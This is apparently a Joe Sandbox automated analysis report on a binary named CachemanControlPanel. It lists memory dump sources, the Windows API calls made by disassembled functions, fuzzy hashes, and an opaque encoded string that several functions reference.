                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                        • String ID: h4AC
                                                        • API String ID: 2544007295-4194509778
                                                        • Opcode ID: fc52d2f7b9a0e020f6a7a9f069f50c8eb770e6d8954a95e5d94db27be9662ebb
                                                        • Instruction ID: 9e9369f791690ab54b645ae2d84d8fadd2d3635a321b3f052cbe72292077839e
                                                        • Opcode Fuzzy Hash: fc52d2f7b9a0e020f6a7a9f069f50c8eb770e6d8954a95e5d94db27be9662ebb
                                                        • Instruction Fuzzy Hash: C831E272601B069FC721CF59D848A97BBF0FB84751F18466FE88597310DB78E881CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • wcslen.MSVCRT ref: 00420F30
                                                        • GetTextExtentPoint32W.GDI32(?,?,00000000,?), ref: 00420F3E
                                                        • GetStockObject.GDI32(00000004), ref: 00420F6C
                                                        • FillRect.USER32(?,?,00000000), ref: 00420F7E
                                                        • wcslen.MSVCRT ref: 00420FA5
                                                        • TextOutW.GDI32(?,00000000,00000000,?,00000000), ref: 00420FB6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Textwcslen$ExtentFillObjectPoint32RectStock
                                                        • String ID:
                                                        • API String ID: 936965569-0
                                                        • Opcode ID: ac283097ffb213dc85b768b67bc323809a8fb40e50309105418e5999bb69746f
                                                        • Instruction ID: 997df7aa2b5b2257af776fe704ff3f1510b3b6ef6a6a81a6db400470fb68605d
                                                        • Opcode Fuzzy Hash: ac283097ffb213dc85b768b67bc323809a8fb40e50309105418e5999bb69746f
                                                        • Instruction Fuzzy Hash: 49314A71204701AFD721DF29DD44AABB7E8FF88704F41082EF599C2261E7B4E844CB66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _atan2f.LIBCMT ref: 004216D5
                                                          • Part of subcall function 00421799: fmod.MSVCRT ref: 004217AC
                                                        • SelectObject.GDI32(?,?), ref: 00421702
                                                        • GetObjectW.GDI32(?,0000005C,?,?), ref: 0042171B
                                                        • DeleteObject.GDI32(?), ref: 00421749
                                                        • CreateFontIndirectW.GDI32(?), ref: 00421753
                                                        • SelectObject.GDI32(?,00000000), ref: 00421767
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$CreateDeleteFontIndirect_atan2ffmod
                                                        • String ID:
                                                        • API String ID: 1891428117-0
                                                        • Opcode ID: 4dd1f7aac9f086462723607c261486d3041e3b118eeda5caf935c96eb2849626
                                                        • Instruction ID: 5db56162e49b22d30abcc26634b764df94c95182ef9f4b32226d482238023057
                                                        • Opcode Fuzzy Hash: 4dd1f7aac9f086462723607c261486d3041e3b118eeda5caf935c96eb2849626
                                                        • Instruction Fuzzy Hash: 9021A2B0A01759DFDB109FA0ED4CAEB7FB8FF84311F50487AE856A6160DB349821CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetObjectType.GDI32(00000000), ref: 00411CD1
                                                        • DeleteObject.GDI32(00000000), ref: 00411CDE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$DeleteType
                                                        • String ID:
                                                        • API String ID: 1880294369-0
                                                        • Opcode ID: 05016fb70f9bb151aa73d083722e38705d2fac40da92da85ffc6a5a57b2ffec2
                                                        • Instruction ID: cee4bee1cdb563a57488dc97cbd1fa94efa7d076e46b1f820e9b5d47e4575ab9
                                                        • Opcode Fuzzy Hash: 05016fb70f9bb151aa73d083722e38705d2fac40da92da85ffc6a5a57b2ffec2
                                                        • Instruction Fuzzy Hash: 7811A0B5105611EFCB221F60EE486AB7EB2FF80311B205A2AF24250070C77A5CD1EB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040BB66
                                                        • ://, xrefs: 0040BB4E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr
                                                        • String ID: ://$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1392478783-740708298
                                                        • Opcode ID: 3c316bf7e960b257c30a0fc10dde0313564711ea264348df36b4f3bec94b4657
                                                        • Instruction ID: 457b88b3bffdcc1c46247ab3063a861ea074ddf2ace89d699709526af7964219
                                                        • Opcode Fuzzy Hash: 3c316bf7e960b257c30a0fc10dde0313564711ea264348df36b4f3bec94b4657
                                                        • Instruction Fuzzy Hash: 4EF0D1327097252BCA3969196CD1D2B32A4DE89724B22047FF801767C5DFBD9D0106DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040B977
                                                        • ://, xrefs: 0040B95F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: strstr
                                                        • String ID: ://$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1392478783-740708298
                                                        • Opcode ID: 186a7dc2ec94cfe95b2df07d66f19cfa177a9606fec4381fd11b7f1eff6cd309
                                                        • Instruction ID: 66e8118851eccd3037b595669a4bb100727363f62911f2429a9edfce30e43dbf
                                                        • Opcode Fuzzy Hash: 186a7dc2ec94cfe95b2df07d66f19cfa177a9606fec4381fd11b7f1eff6cd309
                                                        • Instruction Fuzzy Hash: 4BF0F6B274972926C6266925AC82F5F2389DE86724B26043FF900722C1EF7E8D0545DD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnregisterWait.KERNEL32(?), ref: 004203DA
                                                        • CloseHandle.KERNEL32(?), ref: 004203E3
                                                        • EnterCriticalSection.KERNEL32(00434170), ref: 004203EF
                                                        • LeaveCriticalSection.KERNEL32(00434170), ref: 00420414
                                                        • HeapFree.KERNEL32(00000000,?), ref: 00420432
                                                        • HeapFree.KERNEL32(?,?), ref: 00420444
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
                                                        • String ID:
                                                        • API String ID: 4204870694-0
                                                        • Opcode ID: d6e3a218d48f6e14dded63591b0fd6c716f4fc6abd935872479a99d046c68521
                                                        • Instruction ID: 2c31465e422d4553dfd882c223db886fa24cd90375f858dc5dfd14b10e6c88fe
                                                        • Opcode Fuzzy Hash: d6e3a218d48f6e14dded63591b0fd6c716f4fc6abd935872479a99d046c68521
                                                        • Instruction Fuzzy Hash: 08018C31301612AFCB18AF11ED88A1ABFF8FF49312314953DF20683621C371AC12CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00417344
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocHeapwcsncpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 2304708654-3176450862
                                                        • Opcode ID: b4e071cd1772d0abc4855a79c19f66107f2cbdcfbf221aaa4b7a00905f0a8280
                                                        • Instruction ID: e98cb44a260608e4182e02c8ced9d4522559d51d906dfe8ed9a6999018797bec
                                                        • Opcode Fuzzy Hash: b4e071cd1772d0abc4855a79c19f66107f2cbdcfbf221aaa4b7a00905f0a8280
                                                        • Instruction Fuzzy Hash: 0C51E4345083059BC7249F28D8406ABBBF4FF84348F540A1EFC5597390E778EA95C79A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004188D0: TlsGetValue.KERNEL32(00000022,00001000,00000000,00000000), ref: 004188DC
                                                          • Part of subcall function 004188D0: RtlReAllocateHeap.NTDLL(02A80000,00000000,?,?), ref: 00418937
                                                        • _isnan.MSVCRT ref: 00417113
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeapValue_isnan
                                                        • String ID: %%.%df$+Infinity$-Infinity$NaN
                                                        • API String ID: 2412093236-1490034909
                                                        • Opcode ID: d7b139aa5b844761cc268f01ec11fe0a5f66cf6737c467e30edefb91cc8381f6
                                                        • Instruction ID: de77808571c42264773c6ac9b2fbd13e8e813b6b5c8ed4380cf91e5ff9d991e3
                                                        • Opcode Fuzzy Hash: d7b139aa5b844761cc268f01ec11fe0a5f66cf6737c467e30edefb91cc8381f6
                                                        • Instruction Fuzzy Hash: E941677561820145CB18A638C8157F772B0EF80358F55456FE986DB3C1FB3D89C682AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapAlloc.KERNEL32 ref: 0040D818
                                                        • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00000000,00001000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000), ref: 0040D891
                                                        • ReadFile.KERNEL32(?,00001000,00000001,?,00000000,?,00000000,00000000,00001000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000), ref: 0040D8F9
                                                          • Part of subcall function 0040D390: memcpy.MSVCRT ref: 0040D3D7
                                                        • SetFilePointer.KERNEL32(?,?,?,000000FF,?,00000001), ref: 0040D92D
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0040D835
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocFileHeap$PointerReadmemcpy
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3421085004-3176450862
                                                        • Opcode ID: 074115ea11e0b427c3c517fea541aaaaaf869a13e32407ce3aaba481758b7403
                                                        • Instruction ID: e4f1d5556fb928c12640f93b328587f0ceb042ce7165f1c1576916950bd281f7
                                                        • Opcode Fuzzy Hash: 074115ea11e0b427c3c517fea541aaaaaf869a13e32407ce3aaba481758b7403
                                                        • Instruction Fuzzy Hash: 2D418171A08341AFD711DF58C804B6BB7E4EF88320F54863AF9A5A23D1D378D94D8B5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,0040BBE4,00000000), ref: 00420661
                                                        • malloc.MSVCRT ref: 00420671
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000), ref: 0042068B
                                                        • malloc.MSVCRT ref: 004206A0
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00420631
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWidemalloc
